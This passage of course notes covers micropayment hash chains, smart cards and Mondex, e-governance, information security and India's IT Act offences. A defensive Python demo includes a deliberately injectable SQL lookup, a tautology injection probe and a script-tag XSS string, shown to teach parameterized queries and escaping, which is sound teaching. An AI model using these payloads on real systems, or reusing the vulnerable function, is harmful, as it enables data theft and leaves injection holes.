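	Count int    // index of Last, i.e. units received so far
}

func NewVendor(root []byte, n int) *Vendor { return &Vendor{n: n, Last: root} }

// Accept hashes w_i (i - Count) times and compares with Last; it returns the
// units paid. Replays (i <= Count), overruns (i > n) and forgeries are rejected.
func (v *Vendor) Accept(w []byte, i int) (units int, ok bool) {
	if i <= v.Count || i > v.n {
		return 0, false
	}
	h := w
	for k := 0; k < i-v.Count; k++ {
		h = hash(h)
	}
	if !bytes.Equal(h, v.Last) {
		return 0, false
	}
	units = i - v.Count
	v.Last, v.Count = w, i
	return units, true
}

// Settle is the broker's check when the vendor presents (root, last, count):
// hashing last count times must reach root; the payer is then charged once.
func Settle(root, last []byte, count int) (charged int, ok bool) {
	h := last
	for k := 0; k < count; k++ {
		h = hash(h)
	}
	if !bytes.Equal(h, root) {
		return 0, false
	}
	return count, true
}

func main() {
	c, _ := NewChain(10) // commitment covering at most 10 units
	v := NewVendor(c.Root(), 10)
	w, i, _ := c.Pay(1)
	fmt.Println(v.Accept(w, i)) // 1 true
	w, i, _ = c.Pay(3)
	fmt.Println(v.Accept(w, i)) // 3 true
	fmt.Println(Settle(c.Root(), v.Last, v.Count)) // 4 true
}
```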

Advantages and risks -

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient [4]. The main benefits from the customer side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options -

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for desired content or goods.

The most common micropayment options are listed below [6].

Call2pay - Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay - Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay - Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card - Payment by credit card. The customer enters his or her credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by Visa™ and MasterCard SecureCode™).

Direct debit - Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses -

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing [2]. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized with microchip embedded on it

Two types

Memory-only chips

Microprocessor chips

Can hold up to 32,000 bytes

Newer smart cards have math co-processors


Perform complex encryption routines quickly

In 1968, German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards -


Why Smart Cards -

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages -

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications -

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned: the SF Bay Area system

Authentication ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks etc

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support multiple currencies


ADVANTAGES

CONSUMER -

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

MERCHANT -

Reliable off-line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION -

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micropayment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy -

Principles protected

o Limits for collecting personal information

o limits for using disclosing and keeping personal information

o keeping personal information accurate

o safeguarding personal information


Limits for collecting personal information

o loads from account

o deposits into account

o lost transactions

Limits for using disclosing and keeping personal information

o safeguard deposits

o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online

o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos - between applications - ITSEC 6 designation

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks - Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card, you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance -

Both the terms are treated to be the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with the definition of e-governance, is that there is no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup with the support of local processes and parameters for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department or anywhere through the network. This is because of the characteristics of CORBA: it is a location transparent, language independent, implementation independent and operating system independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services, like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies are heavyweight, public key security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) - Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G) - Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving

- Long Term Contracts

- User Charges and/or Payments flowing between the Parties

- Shared Investments, but Mainly Private


- Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations


• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition - For and In the Market


The Need to Set the Right Priorities -

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)?

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and private Partners

Structuring of Contract/Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms) and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and is thus a leading indicator of a country's readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION

The term e-Government is defined by the Organisation for Economic Co-operation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments, as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services depends heavily on the trust they have in the data security of the service.

2 INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency in public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach of an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish a policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS; and

continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality: the capability to prevent unauthorized access to information.

Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in it.
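
Traceability and integrity, two of the requirements listed above, are usually met together by a tamper-evident audit trail. The following is an added example, not code from the notes or from any ISMS standard: a hypothetical hash-chained log in which every entry commits to the digest of the entry before it, so that editing or deleting any past record breaks the chain when it is re-verified. The actor names, resource paths and timestamps are constructed sample data.

```python
import hashlib
import json
from datetime import datetime, timezone
from typing import Optional

# Hypothetical hash-chained audit trail (added example). Each entry stores the
# digest of its predecessor, so a later modification or deletion of any entry
# is detected by walking the chain from the fixed genesis value.

GENESIS = "0" * 64  # digest the first entry links to


def _digest(entry: dict) -> str:
    """Canonical JSON (sorted keys, no whitespace) so an entry always hashes the same way."""
    payload = json.dumps(entry, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(payload).hexdigest()


class AuditLog:
    def __init__(self) -> None:
        self.entries = []

    def record(self, actor: str, action: str, resource: str,
               when: Optional[str] = None) -> str:
        """Append one event and return the digest of the new entry."""
        prev = self.entries[-1]["digest"] if self.entries else GENESIS
        entry = {
            "seq": len(self.entries),
            "time": when or datetime.now(timezone.utc).isoformat(),
            "actor": actor,
            "action": action,
            "resource": resource,
            "prev": prev,
        }
        entry["digest"] = _digest(entry)  # covers every field above, including prev
        self.entries.append(entry)
        return entry["digest"]

    def verify(self):
        """Walk the chain; return (True, -1) or (False, index of the first bad entry)."""
        prev = GENESIS
        for i, e in enumerate(self.entries):
            body = {k: v for k, v in e.items() if k != "digest"}
            if e["seq"] != i or body["prev"] != prev or _digest(body) != e["digest"]:
                return False, i
            prev = e["digest"]
        return True, -1

    def by_actor(self, actor: str) -> list:
        """Traceability: every recorded action of one actor, in chronological order."""
        return [e for e in self.entries if e["actor"] == actor]


if __name__ == "__main__":
    log = AuditLog()  # constructed sample events
    log.record("clerk42", "READ", "citizen/1001", when="2024-01-01T10:00:00+00:00")
    log.record("clerk42", "UPDATE", "citizen/1001", when="2024-01-01T10:05:00+00:00")
    log.record("auditor7", "READ", "citizen/1001", when="2024-01-01T11:00:00+00:00")
    print(log.verify())                       # (True, -1)
    log.entries[1]["actor"] = "someone_else"  # simulate tampering with a stored record
    print(log.verify())                       # (False, 1)
```

The chain only proves that the stored history has not been altered since it was written; it says nothing about who wrote it. Non-repudiation additionally needs each entry (or a periodic chain head) signed with a key the actor controls, and the log should be written to storage the application itself cannot rewrite.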

Examples of organizational and technical measures to prevent unauthorized access and processing are:

Protecting premises, equipment and systems software, including input-output units.

Protecting software applications used to process personal data.

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, they have not yet been adequately addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3 INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques such as packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis.

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness.

Continually improve its control environment.

Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. One research work found 816 e-Government websites from 212 different countries to be vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability that attackers may exploit to steal users' information.
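
Both flaws come from the same mistake: untrusted input is concatenated into a language (SQL or HTML) instead of being passed as data. The block below is an added example, not code from the research cited above or from any e-Government site; it runs the same citizen lookup the vulnerable way and the parameterized way against a constructed in-memory SQLite table, and renders a display name with and without HTML escaping. The table, its two rows and the column names are made up for the example.

```python
import html
import sqlite3

# Added example: the vulnerable and the hardened form of one lookup and one
# HTML rendering, side by side. Sample data is constructed.


def setup_db() -> sqlite3.Connection:
    """Constructed sample table standing in for an e-Government citizen register."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (username TEXT, tax_id TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?)",
                     [("alice", "TX-0001"), ("bob", "TX-0002")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # The caller's input becomes part of the statement text, so a quote character
    # in the input changes the structure of the query (SQL injection).
    sql = "SELECT username, tax_id FROM citizens WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    # The statement is fixed; the driver hands the input to the engine as a value,
    # so it can only ever be compared against the column, never parsed as SQL.
    sql = "SELECT username, tax_id FROM citizens WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def render_unsafe(display_name: str) -> str:
    # Untrusted text written into HTML as-is can carry markup or script (XSS).
    return "<p>Welcome, " + display_name + "</p>"


def render_escaped(display_name: str) -> str:
    # Escaping < > & " ' makes the input literal text in the page.
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


if __name__ == "__main__":
    conn = setup_db()
    probe = "x' OR '1'='1"   # classic tautology used here only to show the difference
    print(lookup_vulnerable(conn, probe))      # both rows leak
    print(lookup_parameterized(conn, probe))   # [] : no user is literally named that
    print(render_unsafe("<script>alert(1)</script>"))
    print(render_escaped("<script>alert(1)</script>"))
```

Parameterized queries remove the injection class entirely rather than trying to filter bad characters; output escaping must be applied at the point where data enters HTML (most template engines do it by default), and a Content-Security-Policy header limits the damage when an escape is missed.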

Specific security measures such as firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet that try to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

121 million Internet users

65 million active Internet users, up by 28% from 51 million in 2010

50 million users shop online on e-commerce and online shopping sites

46+ million social network users

346 million mobile users had subscribed to data packages

CYBER LAW

(1) Whoever, with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

Secures access;

Downloads, copies or extracts any data, computer database or any information;

Introduces or causes to be introduced any virus or contaminant;

Disrupts or causes disruption;

Denies or causes denial of access to any person;

Provides any assistance to any person to facilitate access;

Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section - 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

any information that is grossly offensive or has menacing character; or

any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1 Legal recognition of electronic documents

2 Legal recognition of digital signatures

3 Offences and contraventions

4 Justice dispensation systems for cybercrimes

Offences -

Section 65
Offence: Tampering with computer source documents - intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force.
Punishment: Imprisonment up to three years, or/and with fine up to 2 lakh rupees.

Section 66
Offence: Hacking.
Punishment: Imprisonment up to three years, or/and with fine up to 5 lakh rupees.

Section 66-A
Offence: Sending offensive message through electronic means - sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages.
Punishment: Imprisonment up to three years and with fine.

Criticisms -

